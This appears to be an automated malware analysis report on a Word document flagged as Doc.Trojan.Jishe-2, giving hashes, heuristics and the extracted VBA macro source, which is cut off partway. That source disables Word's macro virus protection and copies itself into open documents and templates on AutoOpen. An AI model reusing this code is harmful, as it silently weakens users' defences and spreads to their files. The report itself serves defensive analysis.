Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3fc7e4096dcb6032…

MALICIOUS

Office (OLE)

152.5 KB Created: 2001-04-24 00:53:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b8c8fac0c4ba7ac3e00d7e9686d7e42e SHA-1: 98e6ae789ea25bbad26ceae2ae9648fac47519c3 SHA-256: 3fc7e4096dcb603247069c1181fb7ca7e5c1339f5f0ead8176404d84406a00af
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Jishe-2'. It contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon document opening. The macro code itself appears to be an attempt at a macro virus killer, but the presence of other potentially malicious code and the ClamAV detection suggest it may have secondary malicious functions or be a variant of a known trojan.

Heuristics 5

  • ClamAV: Doc.Trojan.Jishe-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jishe-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46561 bytes
SHA-256: 5d9dd15e936fb71fba4666b4d0976678fd2061cd5fa93932f459c11f20bd51ee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JiShenhua"
'Version 1.0
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
'
Sub AutoOpen()
    Dim file$
    Dim i As Integer
    Dim already, HasVirus As Boolean
    Dim LinesofCode As Long
    Dim answer As String
    Dim myDoc As Document
    Dim myTemp As Template
    
    answer = "MyMacroVirusKillerV1.0"
    
    '当前打开模板文件名
    file$ = WordBasic.[MacroFileName$]()
    
    '关闭宏病毒保护
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    
    '检查打开的文档中是否有病毒
    HasVirus = False
    If (Documents.Count <> 0) Then
        For Each myDoc In Documents
            If (myDoc.VBProject.Protection = 0) Then
                For Each xitem In myDoc.VBProject.VBComponents
                    If (xitem.Name = "ThisDocument") Then
                        '此部分有代码时,如果找不到本模块标志则认定为病毒
                        LinesofCode = xitem.codemodule.CountOfLines
                        If (LinesofCode > 0) And (Not HasVirus) Then
                            HasVirus = Not xitem.codemodule.Find(answer, 1, 1, 1 + LinesofCode, 1)
                        End If
                    ElseIf (xitem.Name <> "JiShenhua") And (xitem.Name <> "VirusReport") Then
                        '文档中除本模块代码之外,如果还有其它代码则认定为病毒
                        HasVirus = True
                    End If
                Next
            End If
        Next
    End If
    '检查文档模板中是否有病毒
    If Not HasVirus Then
        For Each myTemp In Templates
            If (myTemp.VBProject.Protection = 0) Then
                For Each xitem In myTemp.VBProject.VBComponents
                    If (xitem.Name = "ThisDocument") Then
                        '此部分有代码时,如果找不到本模块标志则认定为病毒
                        LinesofCode = xitem.codemodule.CountOfLines
                        If (LinesofCode > 0) And (Not HasVirus) Then
                            HasVirus = Not xitem.codemodule.Find(answer, 1, 1, 1 + LinesofCode, 1)
                        End If
                    ElseIf (xitem.Name <> "JiShenhua") And (xitem.Name <> "VirusReport") Then
                        '文档中除本模块代码之外,如果还有其它代码则认定为病毒
                        HasVirus = True
                    End If
                Next
            End If
        Next
    End If
    If HasVirus Then '如果有病毒,向用户提出报告
        Load VirusReport
        VirusReport.Show
    End If
    '向打开的文档中写入本代码
    If (Documents.Count <> 0) Then
        For Each myDoc In Documents
            '检查文档中是否已经有本模块代码
            already = False
            If (myDoc.FullName = file$) Then
                already = True
            ElseIf (myDoc.VBProject.Protection = 0) Then
                For Each xitem In myDoc.VBProject.VBComponents
                    If (xitem.Name = "JiShenhua") And (xitem.Name <> "VirusReport") Then
                        already = True
                    End If
                Next xitem
            End If
            If (Not already) And (myDoc.VBProject.Protection = 0) Then
                WordBasic.MacroCopy file$ + ":JiShenhua", myDoc.FullName + ":JiShenhua"
                WordBasic.MacroCopy file$ + ":VirusReport", myDoc.FullName + ":VirusReport"
            End If
        Next
    End If
    '向WORD模板中写入本代码
    For Each myTemp In Templates
            '检查文档中是否已经有本模块代码
            already = False
            If (myTemp.FullName = file$) Then
                already = True
            ElseIf (myTemp.VBProject.Protection = 0) Then
                For Each xitem In myTemp.VBProject.VBComponents
                    If (xitem.Name = "JiShenhua") Then
                        already = True
                    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.